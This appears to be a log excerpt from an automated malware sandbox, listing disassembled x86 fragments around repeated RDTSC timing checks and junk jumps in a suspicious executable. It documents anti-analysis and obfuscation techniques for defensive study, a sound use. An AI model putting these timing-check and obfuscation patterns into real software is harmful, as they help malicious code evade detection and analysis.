Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130CA8 second address: 7130D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FC20D17192Fh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC19D472F36h 0x00000015 sub al, 00000068h 0x00000018 jmp 00007FC19D472F2Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [ebp-04h] 0x00000022 pushad 0x00000023 jmp 00007FC19D472F34h 0x00000028 movzx eax, bx 0x0000002b popad 0x0000002c mov dword ptr [esi+08h], eax 0x0000002f jmp 00007FC19D472F2Dh 0x00000034 lea eax, dword ptr [ebx+70h] 0x00000037 jmp 00007FC19D472F2Eh 0x0000003c push 00000001h 0x0000003e jmp 00007FC19D472F30h 0x00000043 nop 0x00000044 pushad 0x00000045 jmp 00007FC19D472F2Eh 0x0000004a pushfd 0x0000004b jmp 00007FC19D472F32h 0x00000050 jmp 00007FC19D472F35h 0x00000055 popfd 0x00000056 popad 0x00000057 push eax 0x00000058 jmp 00007FC19D472F31h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FC19D472F2Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130D89 second address: 7130DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DA7 second address: 7130DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DAB second address: 7130DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DB1 second address: 7130DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DC6 second address: 7130DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DCA second address: 7130DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DD9 second address: 7130DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130DDD second address: 7130DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E1C second address: 7130E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E22 second address: 7130E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F2Ch 0x00000009 sbb si, F5C8h 0x0000000e jmp 00007FC19D472F2Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E45 second address: 7130E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, eax 0x00000009 jmp 00007FC19CEC1DD4h 0x0000000e test edi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC19CEC1DCDh 0x00000019 xor ax, DD96h 0x0000001e jmp 00007FC19CEC1DD1h 0x00000023 popfd 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E8F second address: 7130EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC20D171735h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC19D472F33h 0x00000018 and cx, 8F7Eh 0x0000001d jmp 00007FC19D472F39h 0x00000022 popfd 0x00000023 mov dh, ah 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130EDF second address: 7130F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC19CEC1DD8h 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp-14h] 0x00000011 jmp 00007FC19CEC1DCDh 0x00000016 mov ecx, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC19CEC1DCDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F21 second address: 7130F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F27 second address: 7130F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e jmp 00007FC19CEC1DD6h 0x00000013 mov edx, 76EB06ECh 0x00000018 pushad 0x00000019 mov bl, cl 0x0000001b mov ebx, 06E9A9AEh 0x00000020 popad 0x00000021 mov eax, 00000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC19CEC1DCCh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F7C second address: 7130F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F82 second address: 7130F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F93 second address: 7130F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F97 second address: 7130FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c jmp 00007FC19CEC1DCDh 0x00000011 pop edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 call 00007FC19CEC1DCFh 0x00000019 pop eax 0x0000001a pop edi 0x0000001b popad 0x0000001c test eax, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FCD second address: 7130FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FD1 second address: 7130FE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FE2 second address: 7130FE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FE7 second address: 713109D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, C400h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC20CBC04B0h 0x00000011 jmp 00007FC19CEC1DCFh 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 jmp 00007FC19CEC1DD6h 0x0000001e mov eax, dword ptr [esi] 0x00000020 jmp 00007FC19CEC1DD0h 0x00000025 mov dword ptr [edx], eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FC19CEC1DCEh 0x0000002e adc ch, FFFFFFD8h 0x00000031 jmp 00007FC19CEC1DCBh 0x00000036 popfd 0x00000037 mov cx, EE8Fh 0x0000003b popad 0x0000003c mov eax, dword ptr [esi+04h] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC19CEC1DD0h 0x00000046 sbb cl, 00000038h 0x00000049 jmp 00007FC19CEC1DCBh 0x0000004e popfd 0x0000004f jmp 00007FC19CEC1DD8h 0x00000054 popad 0x00000055 mov dword ptr [edx+04h], eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713109D second address: 71310A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310A2 second address: 71310A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310A8 second address: 71310AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310AC second address: 71310B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310B0 second address: 7131173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b jmp 00007FC19D472F2Dh 0x00000010 mov dword ptr [edx+08h], eax 0x00000013 jmp 00007FC19D472F2Eh 0x00000018 mov eax, dword ptr [esi+0Ch] 0x0000001b jmp 00007FC19D472F30h 0x00000020 mov dword ptr [edx+0Ch], eax 0x00000023 pushad 0x00000024 mov dx, si 0x00000027 call 00007FC19D472F2Ah 0x0000002c pushfd 0x0000002d jmp 00007FC19D472F32h 0x00000032 sub esi, 36ADEBB8h 0x00000038 jmp 00007FC19D472F2Bh 0x0000003d popfd 0x0000003e pop ecx 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+10h] 0x00000043 jmp 00007FC19D472F2Fh 0x00000048 mov dword ptr [edx+10h], eax 0x0000004b jmp 00007FC19D472F36h 0x00000050 mov eax, dword ptr [esi+14h] 0x00000053 jmp 00007FC19D472F30h 0x00000058 mov dword ptr [edx+14h], eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC19D472F2Ah 0x00000064 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131173 second address: 7131177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131177 second address: 713117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713117D second address: 7131183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131183 second address: 7131187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131187 second address: 71311B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC19CEC1DCAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311B6 second address: 71311BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311BC second address: 71311C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311C2 second address: 71311DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC19D472F2Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311DA second address: 7131211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007FC19CEC1DCEh 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131211 second address: 7131215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131215 second address: 7131219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131219 second address: 713121F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713121F second address: 71312A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC19CEC1DCEh 0x00000013 and si, A388h 0x00000018 jmp 00007FC19CEC1DCBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC19CEC1DD8h 0x00000024 sub ax, 85E8h 0x00000029 jmp 00007FC19CEC1DCBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+20h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC19CEC1DD5h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71312A0 second address: 71312FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F37h 0x00000009 add ax, 828Eh 0x0000000e jmp 00007FC19D472F39h 0x00000013 popfd 0x00000014 mov si, 0197h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+24h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC19D472F39h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71312FF second address: 7131305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131305 second address: 7131309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131309 second address: 713131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713131A second address: 713131E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713131E second address: 713132E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713132E second address: 71313FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c jmp 00007FC19D472F36h 0x00000011 mov dword ptr [edx+28h], eax 0x00000014 jmp 00007FC19D472F30h 0x00000019 mov ecx, dword ptr [esi+2Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC19D472F2Eh 0x00000023 jmp 00007FC19D472F35h 0x00000028 popfd 0x00000029 pushad 0x0000002a mov esi, 7498955Dh 0x0000002f movzx ecx, bx 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 pushad 0x00000038 mov bh, 0Ah 0x0000003a pushfd 0x0000003b jmp 00007FC19D472F2Ch 0x00000040 sbb cx, 58E8h 0x00000045 jmp 00007FC19D472F2Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov ax, word ptr [esi+30h] 0x00000050 pushad 0x00000051 mov esi, 36C433FBh 0x00000056 jmp 00007FC19D472F30h 0x0000005b popad 0x0000005c mov word ptr [edx+30h], ax 0x00000060 jmp 00007FC19D472F30h 0x00000065 mov ax, word ptr [esi+32h] 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71313FB second address: 71313FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71313FF second address: 713141C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713141C second address: 713145A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e movzx ecx, dx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007FC19CEC1DD1h 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713145A second address: 713145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713145E second address: 71314A4 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FC19CEC1DD4h 0x0000000c popad 0x0000000d test ecx, 00000700h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC19CEC1DCEh 0x0000001a xor esi, 6F42BFF8h 0x00000020 jmp 00007FC19CEC1DCBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71314A4 second address: 71314C9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4A423C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007FC20D17118Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC19D472F33h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71314C9 second address: 71314FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d pushad 0x0000000e movzx eax, di 0x00000011 mov si, di 0x00000014 popad 0x00000015 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, ecx 0x0000001e mov dh, ch 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71314FE second address: 7131513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131513 second address: 7131537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+40h], FFFFFFFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edi, cx 0x00000015 push ecx 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131537 second address: 713158E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F37h 0x00000009 and eax, 47ECB5EEh 0x0000000f jmp 00007FC19D472F39h 0x00000014 popfd 0x00000015 mov ch, F5h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop esi 0x0000001b pushad 0x0000001c mov ebx, 3EBA1D7Ch 0x00000021 mov ecx, edi 0x00000023 popad 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC19D472F2Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0048 second address: 70C004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C004D second address: 70C00B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 movzx ecx, di 0x0000000c movsx edx, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FC19D472F34h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov dl, ch 0x0000001b pushfd 0x0000001c jmp 00007FC19D472F33h 0x00000021 jmp 00007FC19D472F33h 0x00000026 popfd 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC19D472F35h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0653 second address: 70C0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0657 second address: 70C0686 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC19D472F2Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov cx, dx 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC19D472F39h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0686 second address: 70C06C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FC19CEC1DCEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC19CEC1DD7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06C7 second address: 70C06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06DF second address: 70C06EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06EE second address: 70C06F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06F2 second address: 70C06F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06F6 second address: 70C06FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A52 second address: 70C0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A56 second address: 70C0A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A5C second address: 70C0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DCDh 0x00000009 rdtsc
